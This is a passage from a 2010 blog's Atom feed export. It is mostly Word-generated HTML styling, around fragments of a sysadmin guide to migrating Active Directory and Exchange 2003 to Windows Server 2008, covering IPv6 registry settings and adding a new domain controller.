effect.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;span style="font-size:100%;"&gt;To revert and enable IPv6,      delete “DisabledComponents” registry key or set its registry value to 0.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;/li&gt;&lt;/ol&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6244782714089609760?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6244782714089609760/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6244782714089609760&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6244782714089609760'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6244782714089609760'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/03/upgrademigrationtranstioning-adexchange_21.html' title='Upgrade/Migration/Transtioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part III'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3368576505639312846</id><published>2010-03-22T11:23:00.000+11:00</published><updated>2010-03-22T11:25:40.152+11:00</updated><title type='text'>Upgrade/Migration/Transtioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part II</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:officedocumentsettings&gt;   &lt;o:relyonvml/&gt;   &lt;o:allowpng/&gt;  &lt;/o:OfficeDocumentSettings&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;link rel="themeData" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-AU&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 415 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-520092929 1073786111 9 0 415 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:0cm; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt; 	mso-ascii-font-family:Calibri; 	mso-fareast-font-family:Calibri; 	mso-hansi-font-family:Calibri;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 72.0pt 72.0pt 72.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:67653150; 	mso-list-type:hybrid; 	mso-list-template-ids:-1534554444 -1484599120 201916441 201916443 201916431 201916441 201916443 201916431 201916441 201916443;} @list l0:level1 	{mso-level-text:%1; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:27.0pt; 	text-indent:-18.0pt;} @list l1 	{mso-list-id:1858155571; 	mso-list-type:hybrid; 	mso-list-template-ids:-1427713376 -1281478176 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;} @list l1:level1 	{mso-level-start-at:0; 	mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-18.0pt; 	font-family:Wingdings; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman";} ol 	{margin-bottom:0cm;} ul 	{margin-bottom:0cm;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif"; 	mso-bidi-font-family:"Times New Roman";} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;Phase2 - Installation of New Server (AD, Exchange, Mail box Move)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;&lt;span style=""&gt;   &lt;/span&gt;Installation of new server and Transfer FSMO roles&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;A/&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:130%;"  &gt;&lt;span style=""&gt; &lt;/span&gt;&lt;b style=""&gt;Install New Windows Server Enterprise 2008&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:130%;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;B/&lt;span style=""&gt; &lt;/span&gt;Make new Windows Server Enterprise 2008 a member server/Additional domain controller&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Go to Start &gt;Server manager &gt;click on roles &gt;click on Add roles &gt; select AD domain services &gt; will prompt you for .NET 3.5 installation &gt; click on add requirements &gt; click next and wait for installation to finish.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Roles&gt;AD domain services &gt;Run active directory installation wizard &gt; click next &gt;click “Existing forest” “Add a domain controller to an existing forest” &gt; click next &gt; check the domain name &gt; make sure you have checked “my current logged on credential” &gt; If it prompts for not able to install read-only domain controller in this domain click on YES to continue &gt; continue with default and finish the installation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(**Check the AD, DNS are there and all up to date)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" 